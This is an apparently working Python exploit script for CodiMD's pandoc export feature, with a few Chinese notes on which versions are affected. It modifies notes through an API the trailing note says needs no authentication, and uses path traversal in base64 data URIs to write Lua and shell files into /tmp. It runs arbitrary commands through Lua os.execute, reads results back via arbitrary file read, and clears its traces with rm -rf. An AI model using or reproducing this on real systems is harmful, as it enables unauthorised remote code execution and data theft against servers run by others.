exploit.py

import requests
import base64
import argparse
import json
from urllib.parse import urlparse

requests.packages.urllib3.disable_warnings() 

url = ""
note_id = ""
headers = {}

def banner():
    print(r'''   ___               _      _                _              ___             _ __     _               _      _     
  / __|    ___    __| |    (_)    _ __    __| |     o O O  | __|   __ __   | '_ \   | |     ___     (_)    | |_   
 | (__    / _ \  / _` |    | |   | '  \  / _` |    o       | _|    \ \ /   | .__/   | |    / _ \    | |    |  _|  
  \___|   \___/  \__,_|   _|_|_  |_|_|_| \__,_|   TS__[O]  |___|   /_\_\   |_|__   _|_|_   \___/   _|_|_   _\__|  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-\'''')
    print()

def getParameter():
    parser = argparse.ArgumentParser()

    parser.add_argument('-u', '--url', type=str, help='The target url.', required=True)
    parser.add_argument('-H', '--headers', type=str, help='Give me headers')
    args = parser.parse_args()

    return vars(args)

def setParameters():
    def parse_headers(headers_string):
        headers_dict = {}
        headers = headers_string.split('\n')
        for header in headers:
            if ':' in header:
                key, value = header.split(':', 1)
                headers_dict[key.strip()] = value.strip()
        return headers_dict
    
    args = getParameter()

    global url
    global note_id
    parsed_url = urlparse(args["url"])

    # Extract the base URL and path
    url = f'{parsed_url.scheme}://{parsed_url.netloc}'
    note_id = parsed_url.path.strip('/')

    global headers
    if args["headers"]:
        headers = parse_headers(args["headers"])

# Update notes using the release api
# https://github.com/hackmdio/codimd/pull/1559
# 2.3.0 才有的功能
def updateNotes(content):
    print(content)
    try:
        response = requests.put(url + "/api/notes/" + note_id, verify=False, headers={
            "Content-Type": "application/json"
        }, json={
            "content": content
        })
    except:
        return "Unable to send request"
    print(response.text)
    if "ok" not in response.text:
        return "Unable to send PUT request"

# Recover :filename
def recoverFilename(filename):
    f = open("files/{}".format(filename), "r")
    updateNotes(f.read()) 

# Use exportType=ipynb to read file 
def pandocArbitraryFileReadWithipynb(filename):
    try:
        response = requests.get(url + "/" + note_id + "/pandoc",  headers=headers, verify=False, params={
            "exportType": "ipynb"
        })

        data = json.loads(response.text)
    except:
        return "Unable to send request"

    try:
        result = data["cells"][0]["attachments"][filename]["application/octet-stream"]
        result = base64.b64decode(result)
        return result.decode('utf-8')
    except:
        return "Unable to read file"

# Use exportType=pdf to write file
def pandocArbitraryFileWriteWithPdf():
    requests.get(url + "/" + note_id + "/pandoc", verify=False, headers=headers, params={
        "exportType": "pdf"
    })

# Check if the target is vulnerable or not
def checkVuln():
    response = requests.get(url + "/" + note_id, headers=headers, verify=False)

    if response.status_code != 500:
        response = requests.get(url + "/" + note_id + "/pandoc", verify=False, headers=headers, params={
            "exportType": "ipynb"
        })

        if response.status_code != 200:
            print("target is not vuln!")
            return False
        else:
            print("target is vuln")
            return True
    else:
        print("Maybe you should provide a cookie")
        return False

# Clear a.lua a.sh 1
# os.execute("rm -rf /tmp/a.lua /tmp/a.sh /tmp/1");
def clear():
    updateNotes("![](data://image/png;base64,b3MuZXhlY3V0ZSgicm0gLXJmIC90bXAvYS5sdWEgL3RtcC9hLnNoIC90bXAvMSIpOw==;.lua%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2Ftmp%2fa%2elua)")
    pandocArbitraryFileWriteWithPdf()

    response = requests.get(url + "/" + note_id + "/pandoc", verify=False, headers=headers, params={
        "exportType": "/tmp/a.lua"
    })
    print(response.text)

# RCE
def RCE(cmd):
    # Write os.execute("/bin/bash /tmp/a.sh"); to /tmp/a.lua
    updateNotes("![](data://image/png;base64,b3MuZXhlY3V0ZSgiL2Jpbi9iYXNoIC90bXAvYS5zaCIpOw==;.lua%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2Ftmp%2fa%2elua)")
    pandocArbitraryFileWriteWithPdf()

    # Write command to a.sh
    updateNotes("![](data://image/png;base64,{};.lua%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2F%2e%2e%2F%2e%2e%2F%2e%2e%2Ftmp%2fa%2esh)".format((base64.b64encode((cmd + " > /tmp/1 ").encode('utf-8'))).decode("utf-8")))
    pandocArbitraryFileWriteWithPdf()

    # Run lua
    response = requests.get(url + "/" + note_id + "/pandoc", verify=False, headers=headers, params={
        "exportType": "/tmp/a.lua"
    })
    print(response.text)

    # Get result
    updateNotes("![](../../../../../../tmp/1)")
    print(pandocArbitraryFileReadWithipynb("../../../../../../tmp/1"))

def main():
    setParameters()

    if checkVuln():
        print()

        while True:
            try: 
                cmd = input()
                if cmd == "R":
                    recoverFilename(input("Enter filename: "))
                    break

                RCE(cmd)
            except KeyboardInterrupt:
                print("\nClearing ...")
                clear()
                break

if __name__ == '__main__':
    banner()
    main()

'''
2.0.0 <= version 有 pandoc 
2.3.0 <= version 有 api 可以 update 筆記 不需要使用者身份驗證可以修改筆記

如果目標是 2.3.0 以上並且無法 register 身份的話 可以透過修改 /features note RCE
如果目標低於 2.3.0 高於 2.0.0 需要透過 websocket 修改檔案（待開發）
2.0.0 以下目前確定無法 RCE
'''